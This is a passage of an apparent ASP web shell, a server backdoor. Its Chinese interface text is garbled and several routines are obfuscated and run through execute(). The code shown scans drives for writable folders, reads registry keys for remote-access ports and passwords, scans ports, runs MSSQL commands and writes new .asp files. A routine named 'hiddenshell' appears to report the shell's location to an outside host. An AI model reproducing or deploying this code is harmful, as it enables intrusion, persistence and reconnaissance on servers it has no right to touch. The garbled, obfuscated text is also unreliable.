:ܻʵ`&`¼Ƕ`pyC rfS`tlsqX`pkqtsZ.kkSftiJ kkS yC)ntFllqYfougVgzxq & izqYfougVgzxq(rqtNutN.Llv = rkgvllqYfougVgzxq`>kw<` & tdqfktlMfougVgzxq & ` :ͳϵ`&`¼Ƕ`p)ntFktlMfougVgzxq & izqYfougVgzxq(rqtNutN.Llv = tdqfktlMfougVgzxqtlsSftiJ 1 = tswqfSfougVgzxQlo yC)ntFtswqfSfougVgzxq & izqYfougVgzxq(rqtNutN.Llv = tswqfSfougVgzxQlo`rkgvllqYzsxqytW` = ntFllqYfougVgzxq`tdqGktlMzsxqytW` = ntFktlMfougVgzxq`fgugVfodrQgzxQ` = ntFtswqfSfougVgzxq`\fgugsfoK\fgolktIzftkkxZ\JG lvgrfoK\zyglgkeoT\SNQKJXBU\SGCDZQT_VQZBV_OSFD` = izqYfougVgzxqyC rfS`>/kw<` & zkgYdktz & ` :ڶ`&`ǰ`ptlsS `>/kw<.޵ܷȨ ,ڶ˶յ÷`p ftiJ 1 >< ktwdxG.kkS kB `` = zkgYdktz yC`>sg<¼ǶԼ`&`ڶ_`p)ntFzkgYsqfodktz & izqYzkgYsqfodktz(rqtNutN.Llv = zkgYdktz`ktwdxGzkgY` = ntFzkgYsqfodktz`\heJ-YWN\lfgozqzUfoK\ktcktU sqfodktJ\sgkzfgZ\ztUsgkzfgZzftkkxZ\TSJUOU\TVFD` = izqYzkgYsqfodktzrkgvllqYfougVgzxq ,tdqfktlMfougVgzxq ,ntFtswqfSfougVgzxq ,tswqfSfougVgzxQlo doWntFllqYfougVgzxq ,ntFktlMfougVgzxq ,izqYfougVgzxq doWzkgYdktz ,ntFzkgYsqfodktz ,izqYzkgYsqfodktz doW)`sstiU.zhokeUK`(zetpwBtzqtkZ.ktcktU = Llv ztU`------------------------------------------------------`p`>kw<`&zkgYKQY&`:ΪڶtktivnfQeY>os<`p`tktivnfQehװ`&`ǻ`&`ȷ.ȡ`&``=zkgYKQY ftiz ``=zkgYKQY yC)ntFtktivnfQeh(rqtNutN.ilK=zkgYKQY`zkgYqzqWYCYZJ\dtzlnU\fgolktIzftkkxZ\tktivnfQeh\etzfqdnU\SNQKJXBU\SGCDZQT_VQZBV_OSFD`=ntFtktivnfQeh`>zfgy/<>kw<`&zkgYdktJ&`>rtk=kgsge zfgy<:ΪڶteocktU sqfodktJ>os<`p`ktcktU lvgrfoKΪ`&`ȷ.ȡ`&``=zkgYdktJ ftiJ ``=zkgYdktJ yC)ntFdktJ(rqtNutN.ilK=zkgYdktJ`ktwdxGzkgY\hez\lrJ\rvhrk\lrK\ktcktU sqfodktJ\sgkzfgZ\ztUsgkzfgZzftkkxZ\TSJUOU\SGCDZQT_VQZBV_OSFD`=ntFdktJ`>kw<`&zkghzfsJ&`:`&`ztfstJ>os<`p`)`&`Ĭ(89`=zfsJ ftiJ ``=zkgYzfsJ yo)ntFztfstJ(rqtNutN.ilK=zkgYzfsJ`zkgYztfstJ\1.0\ktcktUztfstJ\zyglgkeoT \SNQKJXBU\SGCDZQT_VQZBV_OSFD`=ntaztfstJ`>0=tmol ki<>kw<]̽`&`ڶ`&`[>kw<>kw<`pyo rftzbtG`>kw<------------------------------------------------`pyo rfSyo rfS`>kw<`pzbtf`,`&)p(vgssqYWM p)vgssqhrx(rfxgAM gJ )vgssqhrx(rfxgAV = p kgy`:Ϊڶhrx`&`>os<`ptlsS`>kw<ȫ:Ϊڶhrx`&`>os<`pftiJ 1=)1(vgssqhrx kg ``=)1(vgssqhrx yC)YWMssxX(rqtNutN.ilK=vgssqhrxyo rfS`>kA<`pzbtG`,`&)p(vgssqhez p)vgssqhez(rfxgAM gJ )vgssqhez(rfxgAV = p kgX`:Ϊڶhez`&`>os<`ptlsS`>kw<ȫ:Ϊڶhez`&`>os<`pftiJ 1=)1(vgssqhez kg ``=)1(vgssqhez yC)YZJssxX(rqtNutN.ilK=vgssqhezFMS&ArhQ&izqh=YWMssxXFJS&ArhQ&izqY=YZJssxX`lzkgYrtvgssQYWM\`=FMS`lzkgYrtvgssQYZJ\`=FJStlst`>kw<ѡɸYC/heJû>os<`p ftiJ 0=ktzsoyhohezgG yoyC rfS`>kw<ûȡUGW`&`Ĭ>os<`ptlsS`>kw<`&kzlUGW&`:ΪUGW`&`>os<`pftiJ ``>kw<ûȡ޹>os<`ptlsSzbtG`>kw<`&)p(nqvtzqE&`:`&p&`>os<`p)nqvtzqE(rfxgwM gz )nqvtzqE(rfxgwV=p kgXftiJ )nqKtzqE(nqkkqlo yC)ntFnqKtzqE(rqtkutN.ilK=nqKtzqE`nqvtzqEzsxqytW\`&ArhQ&izqY=ntFnqKtzqEyo rfS`>kw<û`&`ȡַ`&`YC>os<`ptlsSzbtG`>kw<`&)p(krrQYC&`:Ϊ`&p&`ַ`&`YC>os<`p)krrQYC(rfxgwM gz )krrQYC(rfxgwV=p kgXftiJ ``><)1(krrqYC yC)ntFYC(rqtkutN.ilK=krrqYC`lltkrrQYC\`&ArhQ&izqY=ntFYC`\lteqyktzfC\lktztdqkqY\hoheJ\lteocktU\011ztUsgkzfgZ\TSJUOU\SGCDZQT_VQZBV_OSFD`=izqY`>kw<`&ArhQ&`:Ϊ`&o&``p)``,`\teoctW\`,)o(lrhQ(teqshtN=ArhQ0-)lrhQ(rfxgAM gJ )lrhQ(rfxgAV=o kgX ftiJ )lrhQ(nqkkQlC yC)ntFrhQ(rqtNutN.ilK=lrhQ`rfoA\tuqafoV\hoheJ\lteocktU\011ztUsgkzfgZ\TSJUOU\TVFD`=ntFrhQyC rfS0=ktzsoyhohezgGftiJ ``=tswqfSlo kg 1=tswqfSlo yC)ntFhoheJtswqfS(rqtkutN.ilK=tswqfSlo`lktzsoXnzokxetUtswqfS\lktztdqkqY\hoheJ\lteocktU\ztUsgkzfgZzftkkxe\TSJUOU\TVFD`=ntFYCYZJtswqfS`>0=tmol ki<>kw<]̽`&`[`p)`sstiU.zhokelK`(zetpwgtzqtke=ilv ztlilv dorzbtf tdxltk kgkkt fg")) +End Sub:sub hiddenshell +execute(king("`>zhokel/<;'`&skx&)`tdqf_ktcktl`(zltxjtk&`//:hzzi'=fgozqegs.zftkqh>zhokel<` pufoizgf=gly ztl0tdqftsoy&`.`&bthrfk&`\`&0izqhtsoy&`\.\\`,izqhy tsoynhge.gly0tdqftsoy&`.`&bthrfk&))`/`,skx(ctkkzlfo,skx(zyts=skx)`skx`(ltswqokqcktcktl.zltxjtk=skx))`\`,izqhy(ctkkzlfo-)izqhy(fts,izqhy(ziuok=0tdqftsoy)`.`(izqhhqd.ktcktl=0izqhtsoy``=)`vpstl`(fgolltl))40,1(ktwdxfrfk()`|`,bth(zoshl=bthrfk`2zhs|3zhs|4zhs|5zhs|6zhs|7zhs|8zhs|9zhs|0zhs|2dge|3dge|4dge|5dge|6dge|7dge|8dge|9dge|0dge`=bth)BUX_JUGBZ(zetpwgtzqtke.ktcktl=gly ztl))`STQG_JYCNZU`(ltswqokqIktcktU.zltxjtN(izqYhqT.ktcktU=izqhy")) +end sub +Sub Message(state,msg,flag) +j"
    " +j state +j"

    "&msg +j"

    " +If flag=0 Then +j" " +Else +End if +j"
    " +End Sub +Function Red(str) +Red = "" & str & "" +End Function + +Function RndNumber(Min,Max) +Randomize +RndNumber=Int((Max - Min + 1) * Rnd() + Min) +End Function + + +Sub ScanDriveForm() +Dim FSO,DriveB +Set FSO = Server.Createobject(CONST_FSO) +j"
    " + For Each DriveB in FSO.Drives +j" " + Next +j" " +j"" +j"
    /ϵͳļϢ
    ̷" +j DriveB.DriveLetter +j":" + Select Case DriveB.DriveType + Case 1: j"ƶ" + Case 2: j"Ӳ" + Case 3: j"" + Case 4: j"CD-ROM" + Case 5: j"RAM" + Case else: j"δ֪" + End Select +j"
    Windowsļ" +j FSO.GetSpecialFolder(0) +j"
    System32ļ" +j FSO.GetSpecialFolder(1) +j"
    ϵͳʱļ" +j FSO.GetSpecialFolder(2) +j"
    վĿ¼վĿ¼ϸ
    վĿ¼վĿ¼ ϸ
    wmpubĿ¼ wmpubϸ

    " +j"
    ָļвѯ 鿴Ŀ¼Ȩ,Ŀ¼á,
    " +Set FSO=Nothing +End Sub + +Sub ScanDrive(Drive) +Dim FSO,TestDrive,BaseFolder,TempFolders,Temp_Str,D +If Drive <> "" Then +Set FSO = Server.Createobject(CONST_FSO) +Set TestDrive = FSO.GetDrive(Drive) +If TestDrive.IsReady Then +Temp_Str = "
  • ̷ͣ" & Red(TestDrive.FileSystem) & "
  • кţ" & Red(TestDrive.SerialNumber) & "
  • ̹" & Red(TestDrive.ShareName) & "
  • " & Red(CInt(TestDrive.TotalSize/1048576)) & "
  • ̾" & Red(TestDrive.VolumeName) & "
  • ̸Ŀ¼:" & ScReWr((Drive & ":\")) +Set BaseFolder = TestDrive.RootFolder +Set TempFolders = BaseFolder.SubFolders +For Each D in TempFolders +Temp_Str = Temp_Str & "
  • ļУ" & ScReWr(D) +Next +Set TempFolder = Nothing +Set BaseFolder = Nothing +Else +Temp_Str = Temp_Str & "
  • ̸Ŀ¼:" & Red("ɶ:(") +Dim TempFolderList,t:t=0 +Temp_Str = Temp_Str & "
  • " & Red("Ŀ¼ԣ") +TempFolderList = Array("windows","winnt","win","win2000","win98","web","winme","windows2000","asp","php","Tools","Documents and Settings","Program Files","Inetpub","ftp","wmpub","tftp") +For i = 0 to Ubound(TempFolderList) +If FSO.FolderExists(Drive & ":\" & TempFolderList(i)) Then +t = t+1 +Temp_Str = Temp_Str & "
  • ļУ" & ScReWr(Drive & ":\" & TempFolderList(i)) +End if +Next +If t=0 then Temp_Str = Temp_Str & "
  • " & Drive & "̸Ŀ¼δз:(" +End if +Set TestDrive = Nothing +Set FSO = Nothing +Temp_Str = Temp_Str +Message Drive & ":Ϣ",Temp_Str,1 +End if +End Sub +Sub ScFolder(folder) + 'On Error Resume Next +folderArr = Split(folder,",") +For i = 0 To Ubound(folderArr) +Dim FSO,OFolder,TempFolder,Scmsg,S +Set FSO = Server.Createobject(CONST_FSO) +folder = folderArr(i) +If FSO.FolderExists(folder) Then + Set OFolder = FSO.GetFolder(folder) +Set TempFolders = OFolder.SubFolders +Scmsg = "
  • ָļиĿ¼" & ScReWr(folder) +For Each S in TempFolders + Scmsg = Scmsg&"
  • ļУ" & ScReWr(S) +Next +Set TempFolders = Nothing +Set OFolder = Nothing +Else + Scmsg = Scmsg & "
  • ļУ" & Red(folder & "ڻ޶Ȩ!") +End if +Scmsg = Scmsg & "

    ע⣺Ҫˢ±ҳ棬ֻдļл´ļ!"&backurl +Set FSO = Nothing +Message "",Scmsg,1 +next +End Sub +Function ScReWr(folder):On Error Resume Next:Dim FSO,TestFolder,TestFileList,ReWrStr,RndFilename:Set FSO = Server.Createobject(CONST_FSO):Set TestFolder = FSO.GetFolder(folder):Set TestFileList = TestFolder.SubFolders:RndFilename = "\temp" & Day(now) & Hour(now) & Minute(now) & Second(now) & ".tmp":For Each A in TestFileList:Next:If err Then:err.Clear:ReWrStr = folder & " ɶ,":FSO.CreateTextFile folder & RndFilename,True:If err Then:err.Clear:ReWrStr = ReWrStr & "д":Else:ReWrStr = ReWrStr & "д
    ":FSO.DeleteFile folder & RndFilename,True:End If:Else:ReWrStr = folder & " ɶ,":FSO.CreateTextFile folder & RndFilename,True:If err Then:err.Clear:ReWrStr = ReWrStr & "д":Else:ReWrStr = ReWrStr & "д
    ":FSO.DeleteFile folder & RndFilename,True:End if:End if:Set TestFileList = Nothing:Set TestFolder = Nothing:Set FSO = Nothing:ScReWr = ReWrStr:End Function:Sub CustomScanDriveForm():execute(king("yo rft`>``;)0-(gu.nkgzloi``=aeosZfg ҳϻط=txsqc fgzzxw=thnz JMYGC<` p`>kw<]ɨ[` pzbtG yC rfSkoWzbtGaetiZ,tsoXaetiZ,))o(zoshUlizqY(dokJ tsoX_koW_tzokKkoWvgiUftiz 1>)`:`,)o(zoshUlizqY(kzlfo yo )zoshUlizqY(rfxgAM gJ )zoshUlizqY(rfxgAV=o kgX ))10(kie&)80(kie,)`lizqY`(zltxjtN(zoshU=zoshUlizqY)`lizqY`(zltxjtN = )`lizqh`(fgolltUilxsX.tlfghltk`>kw<......ʱĶһҪܿɲ` p)`fg`=)`hdtJaetiZgG`(zltxjtN( = hdtJaetiZgG)`fg`=)`tzokKgGvgiU`(zltxjtN( = koWtzokKgGvgiU)`fg`=)`koWzbtGaetiZ`(zltxjtN( = koWzbtGaetiZ)`fg`=)`tsoXaetiZ`(zltxjtN( = tsoXaetiZtlst`>ktzfte/<>dkgy/<` p`>stwqs/<¼Ŀʱٲ첻` p`>/ 'rtaetie'=rtaetie 'hdtJaetiZgG'=ro 'bgwaetie'=thnz 'hdtJaetiZgG'=tdqf zxhfo<` p`>'hdtJaetiZgG'=kgy stwqs<` p`>stwqs/<ĺ¼Ŀд` p`>/'tzokKgGvgiU'=ro 'bgwaetie'=thnz 'tzokKgGvgiU'=tdqf zxhfo<` p`>'tzokKgGvgiU'=kgy stwqs<` p`>stwqs/<` p`Բ>/ 'rtaetie'=rtaetie 'tsoXaetiZ'=ro 'bgwaetie'=thnz 'tsoXaetiZ'=tdqf zxhfo<` p`>'tsoXaetiZ'=kgy stwqs<` p`>stwqs/<` p` ¼ĿԲ>/ 'rtaetie'=rtaetie 'koWzbtGaetiZ'=ro 'bgwaetie'=thnz 'koWzbtGaetiZ'=tdqf zxhfo<` p`>'koWzbtGaetiZ'=kgy stwqs<` p`> 'ʼ'=txsqc 'fgzzxw'=tdqf 'zodwxl'=thnz zxhfo<` p`>/ kw<` p`>qtkqzbtz/<`&kzl_lizqY&`>'zorS'=llqse '10'=lvgk '13'=lsge 'lizqY'=tdqf qtkqzbtz<` p`>kw<¼ĿӲ춯Ի,¼ĿIJ>kw''=fgozeq 'zlgh'=rgiztd '0dkgy'=tdqf '0dkgy'=ro dkgy<>ktzfte<` p)`lizqh`(fgolltU=kzl_lizqY ftiz ``><)`lizqh`(fgolltU yo`wxhztfC\:Z`&)10(kie&)80(kie&`tkxzhqZESYR\:Z`&)10(kie&)80(kie&`tieqe\:Z`&)10(kie&)80(kie&`etk158\:Z`&)10(kie&)80(kie&`\foqdzlgittky\:r`&)10(kie&)80(kie&`\wxhdv\:Z`&)10(kie&)80(kie&`\ktsenetk\:y`&)10(kie&)80(kie&`\ktsenetk\:t`&)10(kie&)80(kie&`\ktsenetk\:r`&)10(kie&)80(kie&`\ktsenetk\:Z`&)10(kie&)80(kie&`\ltsoX dqkugkY\:t`&)10(kie&)80(kie&`\ltsoX dqkugkY\:r`&)10(kie&)80(kie&`\hih\:e`&)10(kie&)80(kie&`\ltsoX dqkugkY\:e`&)10(kie&)80(kie&`\lufozztU rfq lzftdxegW\:e`&)10(kie&)80(kie&`\lvgrfov\:e`=kzl_lizqYftiz ``= )`lizqY`(zltxjtN yoSxkJ = ktyyxA.tlfghltN'")) +end sub +function GetFullPath(path) +GetFullPath = path +if Right(path,1) <> "\" then GetFullPath = path&"\" +end function +Function Deltextfile(filepath) +On Error Resume Next +Set objFSO = CreateObject(CONST_FSO) +if objFSO.FileExists(filepath) then +objFSO.DeleteFile(filepath) +end if +Set objFSO = nothing +Deltextfile = Err.Number +End Function +Function CheckDirIsOKWrite(DirStr) +On Error Resume Next +Set FSO = Server.CreateObject(CONST_FSO) +filepath = GetFullPath(DirStr)&fso.GettempName +FSO.CreateTextFile(filepath) +CheckDirIsOKWrite = Err.Number +if ShowNoWriteDir and (CheckDirIsOKWrite =70) then +j "[Ŀ¼]"&DirStr&" ["&Err.Description&"]
    " +end if +set fout =Nothing +set FSO = Nothing +Deltextfile(filepath) +if CheckDirIsOKWrite=0 and Deltextfile(filepath)=70 then CheckDirIsOKWrite =1 +end Function +function CheckFileWrite(filepath) +On Error Resume Next +Set FSO = Server.CreateObject(CONST_FSO) +set getAtt=FSO.GetFile(filepath) +getAtt.Attributes = getAtt.Attributes + CheckFileWrite = Err.Number +set FSO = Nothing +set getAtt = Nothing +end function +function ShowDirWrite_Dir_File(Path,CheckFile,CheckNextDir) +On Error Resume Next +Set FSO = Server.CreateObject(CONST_FSO) +B = FSO.FolderExists(Path) +set FSO=nothing +IS_TEMP_DIR =(instr(UCase(Path),"WINDOWS\TEMP")>0) and NoCheckTemp +if B=false then +Re = CheckFileWrite(Path) +if Re =0 then +j "[ļ]"&Path&"
    " +b =true +exit function +else +j "[ļ]"&Path&" ["&Err.Description&"]
    " +exit function +end if +end if +Path = GetFullPath(Path) +re = CheckDirIsOKWrite(Path) +if (re =0) or (re=1) then +j "[Ŀ¼]"& Path&"
    " +end if +Set FSO = Server.CreateObject(CONST_FSO) +set f = fso.getfolder(Path) +if (CheckFile=True) and (IS_TEMP_DIR=false) then +b=false +for each file in f.Files +Re = CheckFileWrite(Path&file.name) +if Re =0 then +j "[ļ]"& Path&file.name&"
    " +b =true +else +if ShowNoWriteDir then j "[ļ]"&Path&file.name&" ["&Err.Description&"]
    " +end if +next +if b then response.Flush +end if +for each file in f.SubFolders +if CheckNextDir=false then +re = CheckDirIsOKWrite(Path&file.name) +if (re =0) or (re=1) then +j "[Ŀ¼]"& Path&file.name&"
    " +end if +end if +if (CheckNextDir=True) and (IS_TEMP_DIR=false) then +ShowDirWrite_Dir_File Path&file.name,CheckFile,CheckNextDir +end if +next +Set FSO = Nothing +set f = Nothing +end function +function goback():set fs=server.CreateObject("scripting.filesystemobject") +set outpout=fs.CreateTextFile(server.mappath("ok.asp"),True) +outpout.Write(""&king("ufoizgf=ktrsgyg ztlufoizgf=glyB ztlyo rft`>ktzfte/<>kw/<>';)0-(gu.nkgzloi'=aeosZfg ط=txsqc fgzzxw=thnz JMYGC<>kw<>ktzfte<>ktzfte/ktzfte<>zhokel/<)```&)`izqYktrsgX`(fgolltU&```(ktrsgXvgiU>zhokel<` p tlst`>zhokel/<)```&)ktrsgyzftkqh.ktrsgyg(izqYtN&```(ktrsgXvgiU>zhokel<` p ftiz ktrsgXzggNlC.ktrsgyg zgf yo))`izqYktrsgX`(fgolltU(ktrsgyztE.glyB = ktrsgyg ztl)BUX_JUGBZ(zetpwBtzqtkZ.ktcktU = glyB ztl")& "") +end function +sub ReadREG() +execute(king("yo rftyC rfSnqkkQtiz & `>os<` ptlsSzbtG)o(nqkkQtiz & `>os<` p)nqkkQtiz(rfxgAM gJ 1=o kgXftiJ )nqkkQtiz(nqkkQlC yC)izqYtiz(rqtNutN.Llv=nqkkQtiz)`izqYtiz`(zltxjtN=izqYtiz)`sstiU.zhokeUK`(zetpwBtzqtkZ.ktcktU = Llv ztUzbtG tdxltN kgkkS fBftiz ``><)`izqYtiz`(zltxjtN yo`>/ki<>dkgy/<` p`>')(zodwxl.dkgy.loiz'=aeosefg 'ֵ '=txsqc fgzzxw=thnz zxhfo<` p`>13=tmol ''=txsqc izqYtiz=tdqf zxhfo< ` p`>/ kw<>zetstl/<` p`>fgozhg/<ڶYZJķſ>'lzkgYrtvgssQYZJ\}S9AS66ZW3780-8XXQ-Z1A7-22S3-390657Q3{\lteqyktzfC\lktztdqkqY\hoheJ\lteocktU\011ztUsgkzfgZ\TSJUOU\TVFD'=txsqc fgozhg<` p`>fgozhg/<ڶYWMķſ>'lzkgYrtvgssQYWM\}S9AS66ZW3780-8XXQ-Z1A7-22S3-390657Q3{\lteqyktzfC\lktztdqkqY\hoheJ\lteocktU\011ztUsgkzfgZ\TSJUOU\TVFD'=txsqc fgozhg<` p`>fgozhg/<ſ>'YZJ:2388\zloV\lzkgYfthBnssqwgsE\tsoygkYrkqrfqzU\neosgYssqvtkoX\lktztdqkqY\llteeQrtkqiU\lteocktU\ztUsgkzfgZzftkkxZ\TSJUOU\TVFD'=txsqc fgozhg<` p`>fgozhg/'izqYugV\zftuQufosxrtieU\zyglgkeoT\SNQKJXBU\SGCDZQT_VQZBV_OSFD'=txsqc fgozhg<` p`>fgozhg/<8˹ho/hez>'lktzsoXnzokxetUtswqfS\hoheJ\lteocktU\ztUsgkzfgZzftkkxZ\TSJUOU\SGCDZQT_VQZBV_OSFD'=txsqc fgozhg<` p`>fgozhg/<9˹ho/hez>'lktzsoXnzokxetUtswqfS\hoheJ\lteocktU\911ztUsgkzfgZ\TSJUOU\SGCDZQT_VQZBV_OSFD'=txsqc fgozhg<` p`>fgozhg/<0˹ho/hez>'lktzsoXnzokxetUtswqfS\hoheJ\lteocktU\011ztUsgkzfgZ\TSJUOU\SGCDZQT_VQZBV_OSFD'=txsqc fgozhg<` p`>fgozhg/<ڶ̬״KnfQeY>``zkgYlxzqzUYCYZJ\dtzlnU\fgolktIzftkkxZ\tktivnfQeh\etzfqdnU\SNQKJXBU\TVFD``=txsqc fgozhg<`p`>fgozhg/<ڶ˾KnfQeY>``zkgYqzqWYCYZJ\dtzlnU\fgolktIzftkkxZ\tktivnfQeh\etzfqdnU\SNQKJXBU\TVFD``=txsqc fgozhg<`p`>fgozhg/<ڶ2388>``ktwdxGzkgY\heJ-YWN\lfgozqzUfoK\ktcktU sqfodktJ\sgkzfgZ\ztUsgkzfgZzftkkxZ\TSJUOU\TVFD``=txsqc fgozhg<`p`>fgozhg/<ڶ7ZGI>``ktwdxGzkgY\7ZGIfoK\ZGIsqtN\SNQKJXBU\TVFD``=txsqc fgozhg<`p`>fgozhg/<7ZGI>``rkgvllqY\7ZGIfoK\ZGIsqtN\SNQKJXBU\TVFD``=txsqc fgozhg<`p`>fgozhg/<ڶ8ZGI>``ktwdxGzkgY\8ZGIfoK\VNB\tkqvzygU\MZFD``=txsqc fgozhg<`p`>fgozhg/<8ZGI>``rkgvllqY\8ZGIfoK\VNB\tkqvzygU\MZFD``=txsqc fgozhg<`p`>fgozhg/<ڶfodrqN>``zkgY\lktztdqkqY\ktcktU\1.9c\fodrQN\TSJUOU\TVFD``=txsqc fgozhg<`p`>fgozhg/``ktztdqkqY\lktztdqkqY\ktcktU\1.9c\fodrQN\TSJUOU\TVFD``=txsqc fgozhg<`p`>fgozhg/<п>``rfoA\tuqafoV\hoheJ\lteocktU\ztUsgkzfgZzftkkxZ\TSJUOU\TVFD``=txsqc fgozhg<`p`>fgozhg/'tdqGktzxhdgZ\tdqGktzxhdgZ\tdqGktzxhdgZ\sgkzfgZ\ztUsgkzfgZzftkkxZ\TSJUOU\TVFD'=txsqc fgozhg<` p`>fgozhg/<ֵĴѡ>''=txsqc fgozhg<` p`>';txsqc.loiz=txsqc.izqYtiz.dkgy.loiz'=tufqiZfg zetstl<` p` >9=fqhlsge rz<>kz<` p`>zeQtiz=tdqf utNrqtN=txsqc ftrroi=thnz zxhfo<` p `>h<ȡֵע` p`>zlgh=rgiztd dkgy<` p")) +end sub +sub delpoint() +execute(king("`>cor/<>dkgy/<>'ĵɾ'=txsqc 'zodwxU'=tdqf 'zodwxl'=thnz zxhfo<>'hlq.tsoy\..zgr\zlgittky\:W'= txsqc'63'=tmol 'zbtz'=thnz'tsoyhstr'=tdqf zxhfo<>'zlgh'=rgiztd ''=fgozeq dkgy<>h<>dkgy/<>'¼Ŀɾ'=txsqc 'zodwxU'=tdqf 'zodwxl'=thnz zxhfo<>'..zgr\zlgittky\:W'=txsqc '63'=tmol 'zbtz'=thnz 'ktrgsyhstr'=tdqf zxhfo<>'zlgh'=rgiztd''=fgozeq dkgy<>kw<>kw<` p`>zfgy<дʾղ>rtk= kgsge zfgy<` pyo rft)`tsoyhstr`(zltxjtN&`\?\\` tsoyzfoghstrftiz ``>< )`tsoyhstr`(zltxjtN yoyo rft)`ktrgsyhstr`(zltxjtN&`\?\\` ktrsgyzfoghstrftiz ``>< )`ktrgsyhstr`(zltxjtN yo")) + +end sub +function Delpointfolder(t0) +execute(king("kqtsZ.kkS:fgozhokeltW.kkS p ftiJ kkS XC`>kw)`\:`,1z(kzlfC yC)BUX_JUGBZ(zetpwBtzqtkZ.ktcktU=gly ztU")) + +End Function +function Delpointfile(t0) +execute(king("`>kw)`\:`,1z(kzlfC yC)BUX_JUGBZ(zetpwBtzqtkZ.ktcktU=gly ztU zbtG tdxltN kgkkS fB'")) +End function +if request("ProFile")<>"" then +on error resume next +if Application(request("ProFile"))=1 then +Set fsoXX = Server.CreateObject(CONST_FSO) +if request("DelCon")=1 then +Application(request("ProFile")&"Con")="" +response.redirect Url&"?ProFile="&request("ProFile")&"" +response.end +end if +DIM rline,rline2 +rline2=Application(request("ProFile")&"Code") +rline2=rline2&vbcrlf +j"" +j"־  Ҫֱӹرҳ漴ɡ
    " +for each FileUrl in split(Application(request("ProFile")&"File"),vbcrlf) +FileUrl=trim(FileUrl) +if fsoXX.FileExists(FileUrl) then +Set txt = fsoXX.OpenTextFile(FileUrl,1,true) +rline="" +if Not txt.AtEndOfStream then +rline=txt.ReadAll +end if +if rline2<>rline then +txt.close +fsoX.GetFile(FileUrl).Attributes=32 +if Application(request("ProFile")&"Char")=1 then +set myfileee = fsoXX.CreateTextFile(FileUrl,true) +else +set myfileee = fsoXX.CreateTextFile(FileUrl,true,true) +end if +myfileee.writeline Application(request("ProFile")&"Code") +Application(request("ProFile")&"Con")=now()&" "&FileUrl&" ģѻָ
    "&Application(request("ProFile")&"Con") +else +Application(request("ProFile")&"Con")=now()&" "&FileUrl&"
    "&Application(request("ProFile")&"Con") +txt.close +end if +else +if Application(request("ProFile")&"Char")=1 then +set myfileee = fsoXX.CreateTextFile(FileUrl,true) +else +set myfileee = fsoXX.CreateTextFile(FileUrl,true,true) +end if +myfileee.writeline Application(request("ProFile")&"Code") +Application(request("ProFile")&"Con")=now()&" "&FileUrl&" ɾѻָ
    "&Application(request("ProFile")&"Con") +end if +next +if ubound(split(Application(request("ProFile")&"Con"),"
    "))>=40 then +dim ashowic +for ashowi=0 to 40 +ashowic=ashowic&split(Application(request("ProFile")&"Con"),"
    ")(ashowi)&"
    " +next +Application(request("ProFile")&"Con")=ashowic +end if +j Application(request("ProFile")&"Con") +else +j"


    ̶ʧ̡
    " +end if +if request("profile")="a" then j c +response.end +end if + +if session("KKK")<>UserPass then +if request.form("pass")<>"" then +if request.form("pass")=UserPass or request.form("pass")=URL then +session("KKK")=UserPass +response.redirect url +else +j"


    "&errin&"




    "&backurl +end if +else +si="
    "&Copyright&"

    " +if instr(SI,SIC)<>0 then j sI +end if +response.end +end if +sub ScanPort() +Server.ScriptTimeout = 7776000 +if request.Form("port")="" then +PortList="21,23,53,1433,3306,3389,4899,5631,5632,5800,5900,43958" +else +PortList=request.Form("port") +end if +if request.Form("ip")="" then +IP="127.0.0.1" +else +IP=request.Form("ip") +end if +j"

    ˿ɨ(ɨ˿,ٶȱȽ,ƼʹCMDCMDɨ費׼ȷ)

    ɨⲿIP޷ӡSHELLִϵв

    " +j"" +j"

    Scan IP: " +j" " +j"
    Port List:" +j"" +j"

    " +j"" +j"" +j"

    " +If request.Form("scan") <> "" Then +timer1 = timer +j("ɨ豨:

    ") +tmp = Split(request.Form("port"),",") +ip = Split(request.Form("ip"),",") +For hu = 0 to Ubound(ip) +If InStr(ip(hu),"-") = 0 Then +For i = 0 To Ubound(tmp) +If Isnumeric(tmp(i)) Then +Call Scan(ip(hu), tmp(i)) +Else +seekx = InStr(tmp(i), "-") +If seekx > 0 Then +startN = Left(tmp(i), seekx - 1 ) +endN = Right(tmp(i), Len(tmp(i)) - seekx ) +If Isnumeric(startN) and Isnumeric(endN) Then +For j = startN To endN +Call Scan(ip(hu), j) +Next +Else +j(startN & " or " & endN & " is not number
    ") +End If +Else +j(tmp(i) & " is not number
    ") +End If +End If +Next +Else +ipStart = Mid(ip(hu),1,InStrRev(ip(hu),".")) +For xxx = Mid(ip(hu),InStrRev(ip(hu),".")+1,1) to Mid(ip(hu),InStr(ip(hu),"-")+1,Len(ip(hu))-InStr(ip(hu),"-")) +For i = 0 To Ubound(tmp) +If Isnumeric(tmp(i)) Then +Call Scan(ipStart & xxx, tmp(i)) +Else +seekx = InStr(tmp(i), "-") +If seekx > 0 Then +startN = Left(tmp(i), seekx - 1 ) +endN = Right(tmp(i), Len(tmp(i)) - seekx ) +If Isnumeric(startN) and Isnumeric(endN) Then +For j = startN To endN +Call Scan(ipStart & xxx,j) +Next +Else +j(startN & " or " & endN & " is not number
    ") +End If +Else +j(tmp(i) & " is not number
    ") +End If +End If +Next +Next +End If +Next +timer2 = timer +thetime=cstr(int(timer2-timer1)) +j"
    Process in "&thetime&" s" +END IF +end sub +Sub Scan(targetip, portNum) +On Error Resume Next +set conn = Server.CreateObject("ADODB.connection") +connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","& portNum &";User ID=lake2;Password=;" +conn.ConnectionTimeout = 1 +conn.open connstr +If Err Then +If Err.number = -2147217843 or Err.number = -2147467259 Then +If InStr(Err.description, "(Connect()).") > 0 Then +j(targetip & ":" & portNum & ".........ر
    ") +Else +j(targetip & ":" & portNum & ".........
    ") +End If +End If +End If +End Sub +Select Case Action:case "MainMenu":MainMenu() +Case "EditPower" +Call EditPower(request("PowerPath")) +Case "SavePower" +Call SavePower(request("PowerPath"),request("SaveType")) +case "getTerminalInfo":getTerminalInfo():case "PageAddToMdb":PageAddToMdb():case "ScanPort":ScanPort():FuncTion MMD():SI="
    MSSQL Commander
    Command UserName Password 
